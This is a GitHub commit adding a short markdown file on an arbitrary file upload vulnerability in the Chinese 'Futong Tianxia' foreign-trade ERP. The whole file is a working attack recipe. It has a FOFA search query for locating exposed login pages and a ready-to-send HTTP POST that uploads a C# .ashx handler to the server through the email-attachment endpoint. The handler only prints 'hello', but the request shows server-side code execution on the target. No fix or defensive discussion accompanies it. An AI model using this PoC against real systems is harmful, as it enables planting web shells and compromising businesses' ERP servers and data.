Create 富通天下外贸ERP任意文件上传漏洞.md

wy876 · Apr 27, 2024 · 0b32375 · 0b32375
1 parent 2857cb0
commit 0b32375
Showing 1 changed file with 27 additions and 0 deletions.
diff --git a/富通天下外贸ERP任意文件上传漏洞.md b/富通天下外贸ERP任意文件上传漏洞.md
@@ -0,0 +1,27 @@
+## 富通天下外贸ERP任意文件上传漏洞
+
+## fofa
+```
+title="用户登录_富通天下外贸ERP"
+```
+
+## poc
+```
+POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+ 
+<% @ webhandler language="C#" class="AverageHandler" %>
+using System;
+using System.Web;
+public class AverageHandler : IHttpHandler
+{
+public bool IsReusable
+{ get { return true; } }
+public void ProcessRequest(HttpContext ctx)
+{
+ctx.Response.Write("hello");
+}
+}
+```